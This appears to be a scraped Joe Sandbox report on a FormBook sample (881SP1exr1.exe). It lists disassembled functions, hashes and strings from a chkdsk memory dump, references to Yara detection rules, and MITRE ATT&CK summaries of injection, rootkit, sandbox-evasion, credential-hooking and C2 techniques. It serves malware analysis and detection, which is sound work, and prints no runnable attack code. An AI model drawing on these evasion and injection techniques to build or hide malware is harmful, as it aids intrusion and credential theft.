Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 7b7e87c8b1d708e512718d66e0e13f176f843a698a1c1e97d767f3c2cd40543c
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: D602F471608341AFC305CF68C994E6AFBE9FFC8744F14892DB9894B264DB35E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0594B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0594B6BF

Strings

0, xrefs: 0594B695
0, xrefs: 0594B66F
-, xrefs: 0594B650
+, xrefs: 0594B65A

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: abbfb9201b0c0b958ad72fdedb827b0ba228daf6182df601644b7d62a95f5321
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: EC818F70E092499ADF28CF68C891FFEBBABBF45320F184659D892A7691C634DC418F54

Uniqueness

Uniqueness Score: -1.00%

Function 059B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 059B214F
___swprintf_l.LIBCMT ref: 059B2172

Strings

[, xrefs: 059B212B
]:%u, xrefs: 059B2169
%%%u, xrefs: 059B2146

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 01e3b936b124fe9c910bf6f4e2905f069219ec8faf65763874386b0791befac4
Instruction ID: 6f2e4d9be3e4176f908ebc2d1a5819f82df404b90b109b9a614f2e47c099666c
Opcode Fuzzy Hash: 01e3b936b124fe9c910bf6f4e2905f069219ec8faf65763874386b0791befac4
Instruction Fuzzy Hash: 7021337AA04119ABEF10DF79DA44AFEB7EDEF54654F440126E915D3200EB70A9028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0592F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0597031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 059702E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 059702BD

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: a887511e6996cb9b65a9f49ee320dfe19586c90f597e87c76c0536eb1e79e5d2
Instruction ID: cbd9e7809da39d4cf6ded52d7f65e8a63b46c4ed5188eecbe35e27860e5633bf
Opcode Fuzzy Hash: a887511e6996cb9b65a9f49ee320dfe19586c90f597e87c76c0536eb1e79e5d2
Instruction Fuzzy Hash: C6E1BD316087459FD725CF28C889B2AB7F5FB84724F144A6EF5A68B2E0D774E844CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0593BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 05977BAC
RTL: Resource at %p, xrefs: 05977B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05977B7F

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 25b3a2616d0e074f2080254784d3d083c18fe94b7f8914870953e24e52cc4943
Instruction ID: 8431ce644bdf82abe5f93e069ed9701f32730941f9681e6488a388312c3e42aa
Opcode Fuzzy Hash: 25b3a2616d0e074f2080254784d3d083c18fe94b7f8914870953e24e52cc4943
Instruction Fuzzy Hash: 0D41B3313047069BC724EE29C841F6AB7EAFB85720F100A1DE95AD7680D731E805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0593B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0597728C

Strings

RTL: Re-Waiting, xrefs: 059772C1
RTL: Resource at %p, xrefs: 059772A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05977294

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 8e1977904f835cea3986c73787a6c2f6ba0c606b938709cdc2b9ed434889d7fe
Instruction ID: 3faffdf27c026c7ad38435a25ac2cc5fbb15294487ab1158c9fb5f0311266359
Opcode Fuzzy Hash: 8e1977904f835cea3986c73787a6c2f6ba0c606b938709cdc2b9ed434889d7fe
Instruction Fuzzy Hash: 8941B13170420AABD721DF65CC45F6AB7A6FB85720F100A19F965DB240DB31F852CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 059B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 059B238D
___swprintf_l.LIBCMT ref: 059B23B3

Strings

%%%u, xrefs: 059B2384
]:%u, xrefs: 059B23AA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 61644cf26f95b9cf09e23900d0db8edf0e5ae42ace27aa4254ad873b63d9f0ad
Instruction ID: 2f73f7f22fe72ae4d6fe794e727e4f528cc6eee7dd0c546e00319dab4eecd954
Opcode Fuzzy Hash: 61644cf26f95b9cf09e23900d0db8edf0e5ae42ace27aa4254ad873b63d9f0ad
Instruction Fuzzy Hash: 4F318476A00219AFEF20DF29DD45BEEB7FCFB44610F440556E849E3200EB70AA458FA0

Uniqueness

Uniqueness Score: -1.00%

Function 05947D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05947E8B

Strings

-, xrefs: 05947DDD
+, xrefs: 05947DE8

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: d769d8b7a80bcf0b2a729fadf9c44be9f2fed47be94ccaa81d95c02895ac1fc6
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 6D919470E0421E9ADB24DFA9C890EBFB7AAFF44320F54865AE855A72D0D7309D438F50

Uniqueness

Uniqueness Score: -1.00%

Function 05909126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 05909191
@, xrefs: 05909175

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: abc7850b12d4ec00aaf9a2cb8e5c68baff3ffc4987772844a928f5e1f9817503
Instruction ID: c1544037c2db4d7fb9149822e8d66fe75b165157a3fb62b01630e9fb891b01d2
Opcode Fuzzy Hash: abc7850b12d4ec00aaf9a2cb8e5c68baff3ffc4987772844a928f5e1f9817503
Instruction Fuzzy Hash: 94812A75E052699FDB31CB54CD45BEAB7B8AF48750F0045EAE90AB7280D7309E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 881SP1exr1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\881SP1exr1.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
881SP1exr1.exe

Function 015ECFD0 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Function 015ECFE0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 078D8318 Relevance: 1.8, APIs: 1, Instructions: 268
injectionCOMMON

Function 078D87F4 Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Function 078D8800 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 015EAD48 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Function 015E44C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 015E590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 078D9DF8 Relevance: 1.6, APIs: 1, Instructions: 77
windowCOMMON